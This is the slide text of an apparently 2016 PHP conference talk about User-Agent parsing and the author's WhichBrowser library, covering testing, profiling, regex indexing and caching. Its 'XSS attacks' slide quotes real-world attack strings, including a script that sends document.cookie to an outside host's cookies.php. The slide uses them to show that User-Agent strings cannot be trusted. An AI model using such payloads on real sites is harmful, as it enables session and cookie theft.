everybody lies PHP.FRL, August 23rd 2016

1 Browser sniffing explained

why a talk about browser sniffing?

browser sniffing is dirty

you should use feature detection

why a talk about browser sniffing?

what is browser sniffing?

The HTTP specification defines the User-Agent header. It contains a string with information about the browser.

Every request the browser makes to the server includes the User-Agent header

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net

GET http://whichbrowser.net/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-us User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0) Accept-Encoding: gzip, deflate Connection: Keep-Alive Host: whichbrowser.net HTTP/1.1 200 OK Date: Mon, 08 Feb 2016 10:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16 Last-Modified: Thu, 15 Jan 2015 10:10:40 GMT ETag: "984-50cae11796432" Accept-Ranges: bytes Content-Length: 2436 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 <!doctype html> <html>

You can use the User-Agent string to identify: the browser the rendering engine the operating system the device model and more

what is browser sniffing good for?

improve ux if you know the platform or browser, you can streamline the user experience

analytics if you know your users, you can build a better site for them

error logging if you know which browser is causing problems, you can fix them

why is browser sniffing hard?

things started out simple

Mosaic Mosaic/0.9 The name of the browser The version of the browser

Netscape Navigator Mozilla/1.0 (Win3.1) The code name of the browser The version of the browser Operating system

but it quickly started to get complicated

Internet Explorer Mozilla/1.0 (compatible; MSIE 1.0; Windows 95) The name of the browser Compatible with Netscape Navigator 1.0 The version of the browser Operating system

Opera Opera/8.54 (Windows 95; U; en) The name of the browser The version of the browser Operating system English language United States level encryption

Opera Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 The name of the browser The version of the browser Rendering engine

Opera Opera/9.8 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.10 The name of the browser Fake version of the browser Real version of the browser

Firefox Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1) Gecko/20090624 Firefox/3.5 The name of the rendering engine Build date of the rendering engine The name of the browser Version of the browser Version of the rendering engine

Firefox Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Build date is no longer updated

Firefox Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/16.0 Firefox/16.0

and it gets worse…

Safari Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.3 Safari/525.28.3 The name of the browser Version of the browser

Chrome Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/525.27.1 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/525.28.3 The name of the browser Version of the browser

Opera Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.180 The name of the browser Version of the browser

Internet Explorer Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Version of the browser

Edge Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/525.28.3 Edge/12.10162 The name of the browser Version of the browser

and those were all relatively normal User-Agent strings

“User-Agent strings only get larger over time, never smaller” Niels’s law of User-Agent strings

Samsung Internet Mozilla/5.0 (Linux; Android 4.3; en; SAMSUNG GT-I9505 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/ 28.0.1500.94 Mobile Safari/537.36 Samsung device Version of the browser

Nokia Xpress for Windows Phone Mozilla/5.0 (Series40; NOKIALumia800; Profile/MIDP-2.1 Configuration/CLDC-1.1) Gecko/20100401 S40OviBrowser/1.8.0.50.5

Sometimes browsers include a compatibility mode, or desktop mode which deliberately changes the User-Agent string

Opera Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser The name of the operating system Version of the browser

Opera Mobile (desktop mode) Opera/9.80 (X11; Linux zbov; U; en) Presto/2.9.201 Version/11.50 The name of the browser ROT 13 encrypted “mobi“ Version of the browser

Internet Explorer Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Browser version

Internet Explorer (compatibility view) Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0) Trident 5 means it’s Internet Explorer 9

Sometimes browsers are just weird

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Vehicle Center Console Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]

Mozilla/4.0 (MobilePhone PLS6600KJ/US/1.0) NetFront/3.1 MMP/2.0

Mozilla/4.08 (PDA; SL-C3000/1.0,Qtopia/1.5.2) NetFront/3.1

Mozilla/5.0 (DTV; TVwithVideoPlayer) NetFront/4.1 AQUOSBrowser/1.0 InettvBrowser/2.2 (08001F;DTV06VSFC;0009;0001)

Mozilla/5.0 (Standard; NF41SW/1.1; like Gecko; TASKalfa 406ci) NetFront/4.1

Mozilla/4.0 (PSP (PlayStation Portable); 2.60)

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2

? Mozilla/5.0 (DAG; 1.4; like Gecko) NetFront/4.2

Mozilla/5.0 (VCC; 1.0; like Gecko) NetFront/4.2 Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] Opera Bork-edition?

BORK BORK BORK

And it is possible to change the User-Agent string yourself

spam http://www.sexxlife.it/sexyshop (sexy shop - sexy toys, BDSM, vibratori, falli, vagine, lubrificanti, dvd porno, film hard, lingerie - Migliaia di articoli nel nostro sexy shop online.; http://www.sexxlife.it; info@sexxlife.it)

XSS attacks

<script>alert("My Little Pony”);</script> <script language="JavaScript">document.location= "http://www.max1094.18.lc/admin/cookies.php?c=" + document.cookie;</script> <img src="http://bravo.trollab.org/mylittlepony.png" alt="My Little Pony”>

XSS attacks

funny people Mozilla/10.0 (compatible; MSIE 10.0; CP/M; 8-bit) Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Surface Zune Phone XL) AppleWebKit/537.36 (KHTML, like Gecko) ( °□°

angry people

angry people FuckZilla/666.0 (Gavnoid; Debile; rv:123.0) FuckYou/123.0 FuckingFox/321.0 Opera/9.80 (Windows NT 6.1; U; FuckYou; xx) Presto/2.10.229 Version/11.62 Seriously, Go fuck yourself W3C standards are important. Stop fucking obsessing over user-agent already.

User-Agent strings cannot be trusted!

Everybody lies

you should never use browser sniffing for controlling access to your website

you should never use browser sniffing for determining browser capabilities

you should never build your own browser sniffing library

2 Creating my own browser sniffing library

open source

PHP 5.4 and up including PHP 7 and HHVM

12.500 lines of code

100% code coverage 5000+ individual tests

device database with 36.000 entries

psr-1 and psr-2 coding style

psr-4 autoloading

psr-6 caching interface

1 How to maintain quality?

testing of course!

What tools do we use?

PHP CodeSniffer

PHP CodeSniffer Check if your code follows coding standards

PHPUnit

PHPUnit Very good for testing the code that defines the public apis

PHPUnit But not so good for testing the actual browser detection

Testrunner

Testrunner Very lean framework for testing browser sniffing

Testrunner YAML files that contain a list of user agent strings and the expected results

Testrunner No coding required Just add a new user agent string and automatically generate the expected results

Continuous integration?

Yes, please!

Automatically start up virtual machines that run your whole test suite after every commit

Automatic testing of your code in multiple versions of PHP

Automatic checking of pull requests with feedback directly in Github

.travis.yml language: php php: - 5.4 - 5.5 - 5.6 - 7.0 - hhvm before_script: - composer self-update - composer update --ignore-platform-reqs --prefer-source script: - vendor/bin/phpcs --standard=PSR1,PSR2 -n src - php bin/runner.php --coverage --show check - vendor/bin/phpunit --coverage-clover phpunit.xml after_script: - travis_retry php vendor/bin/coveralls -v

Check if your tests cover all of your source code

Coverage information is generated by PHPUnit and Testrunner

Generating code coverage

Requires Xdebug or phpdbg

Common format is Clover XML

PHPUnit supports generating coverage as Clover XML phpunit --coverage-clover phpunit.xml

For testrunner we need to convert raw Xdebug or phpdbg coverage data to Clover XML

There is a package for that! phpunit/php-code-coverage composer require phpunit/php-code-coverage $coverage = new PHP_CodeCoverage; $coverage->filter()->addDirectoryToWhitelist('src'); $coverage->start('Testrunner'); // run your tests $coverage->stop(); $writer = new PHP_CodeCoverage_Report_Clover; $writer->process($coverage, 'runner.xml');

2 How to make it faster!

profiling of course!

WhichBrowser used to be 4 times slower than it’s competitors

UA Parser Piwik WhichBrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

Why?

Use Xdebug and QCacheGrind

Xdebug has an option to create performance profiles zend_extension="/usr/local/opt/php70-xdebug/xdebug.so" xdebug.profiler_enable=1

View performance profiles in QCacheGrind

65% of time was spend in DeviceModels::identify()

65% of time was spend looking through the device database

65% of time was spend iterating over huge arrays

DeviceModels::$ANDROID_MODELS = [ … 'GT-I92(20|28)!' 'GT-I92(30|35)!' 'GT-I9250' 'GT-I92(60|68)!' 'GT-I9295' 'GT-I93(00|03|05|08)!' 'GT-I93(01)!' 'GT-I95(00|05|07)!' 'GT-I95(02|08)!' 'GT-I95(06)!' … ]; => => => => => => => => => => [ [ [ [ [ [ [ [ [ [ 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Samsung', 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy 'Galaxy Note' ], Golden' ], Nexus' ], Premier' ], S4 Active' ], S III' ], S3 Neo' ], S4' ], S4 Duos' ], S4 Advance' ],

'GT-I93(00|03|05|08)!'

"/^GT-I93(00|03|05|08)/i"

Why not a real database?

Easy editing, easy deployment

Order in the file matters

Why a PHP file?

No need to parse JSON or YAML

The whole database can be cached by the opcode cache

But you do need to iterate over every single item in that array until you have a match

Why not create an index?

You can’t create an index for regular expressions :-(

Or can you?

No, you can’t!

If only we could determine all possible matches for a regular expression…

1 All regular expressions are fixed to the start of the string

2 The shorter the index, the easier it is to find the matching strings

The ideal index length was 2 or 3 characters 1 2 3 4

We can do that!

/^GT-I93(00|03|05|08)/i GT

/^(SHP-)?(SHARP )?SH[0-9]{2,3}/i SH

/^(MEDION|(MD )?LIFETAB)/i ME, MD, LI

/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, K0, K1, K2, K3, K4, K…

/^(Lenovo ?)?(IdeaTab ?)?[KSV][0-9]{4,4}/i LE, ID, “complex list”

Can we do this in PHP?

There is a package for that! icomefromthenet/reverse-regex composer require icomefromthenet/reverse-regex use ReverseRegex\Lexer; $lexer = new Lexer($regexp); $lexer->moveNext(); if ($lexer->isNextTokenAny([ Lexer::T_LITERAL_CHAR,Lexer::T_LITERAL_NUMERIC ])) { … } else if ($lexer->isNextToken(Lexer::T_CHOICE_BAR)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_OPEN)) { … } else if ($lexer->isNextToken(Lexer::T_GROUP_CLOSE)) { …

Generate keys from a regular expression in just 100 lines of code

DeviceModels::$ANDROID_INDEX = [ … '@HW' => array ( 0 => '(HW-|HUAWEI )?(TIT|TAG)!!', 1 => '(HW-|HUAWEI |HONOR )?(ATH|CHE|CHM|HN3|H30|H60|HOL|KIW|PE|PLK|SCL)!!', 2 => '(HW-|HUAWEI )?(CHC|KII)!!', 3 => '(HW-|HUAWEI )?(ALE|D2|G6|G7|GRA|M100|P2|P6|P7|RIO|SC|Sophia)!!', 4 => '(Huawei|Ascend|HW-)!!', 5 => 'HW-01E', 6 => 'HW-03E', ), … ];

Looking up an android device (without index) 1✕ foreach($data as $item) 15.000 ✕ preg_match($item, $model) $item === $model 1✕ return $item or

Looking up an android device (with index) 1✕ $i = $index[substr(0,2,$model)] 1✕ foreach($i as $item) 1 - 100 ✕ preg_match($item, $model) $item === $model 1✕ return $data[$item] or

UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

But wait…

Again lists of regular expressions, but with no possible way to create an index

Multiple calls to preg_match with simple regular expressions

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

preg_match is fast

But it has a bit of overhead

Replace multiple calls with a single call to reduce overhead

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { … } if (preg_match(‘/Xbox One/u', $ua)) { …

if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

if (!preg_match(‘/(Nintendo|Nitro|PlayStation|PS[0-9]|Sega|Dreamcast|Xbox)/ui’, $ua)) { return; } if (preg_match('/Nintendo Wii/u', $ua)) { … } if (preg_match('/Nintendo Wii ?U/u', $ua)) { … } if (preg_match('/PlayStation Vita/u', $ua)) { … } if (preg_match('/PlayStation 4/u', $ua)) { …

We still do the individual checks, but only if we are certain there is a match

UA Parser Piwik Whichbrowser Wurlf Browscaps average parsing time (ms) source: http://thadafinser.github.io/UserAgentParserComparison/

On par with others, but with a massive device database

3 How to make it even faster

3 How to make it even faster-der!

caching of course!

A common use case of WhichBrowser is call it from all pages of your website

Instead of analysing every page view you can do it once and reuse that result

memcached redis xcache couchbase apc mongodb filesystem zend data cache wincache

An universal caching API

PSR-6

Memcached // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Retrieve our data $data = $client->get($id); if ($client->getResultCode() === Memcached::RES_NOTFOUND) { $data = … $client->set($id, $data); }

Memcached using a PSR-6 cache adapter // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

Redis using a PSR-6 cache adapter // Initialise the Redis client $client = new \Redis(); $client->connect('localhost', 6379); // Initialise our storage pool $pool = new \Cache\Adapter\Redis\RedisCachePool($client); // Retrieve our data $item = $pool->getItem($id); if ($item->isHit()) { $data = $item->get()); } else { $data = … $item->set($data); $pool->save($item); }

Install adapters for the storage method you want

Set up the storage pool and give it to WhichBrowser

WhichBrowser without caching // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->analyse(getallheaders()); echo $result->toString();

WhichBrowser with Memcached caching // Initialise the Memcached client $client = new \Memcached(); $client->addServer('localhost', 11211); // Initialise our storage pool $pool = new \Cache\Adapter\Memcached\MemcachedCachePool($client); // Analyse the user agent string $result = new WhichBrowser\Parser(); $result->setCache($pool); $result->analyse(getallheaders()); echo $result->toString();

Just 50 lines of code

1 Test everthing! 2 Profile everyting! 3 Cache everything!

4 Never, ever create your own browser sniffing library

Thank you!

Thank you!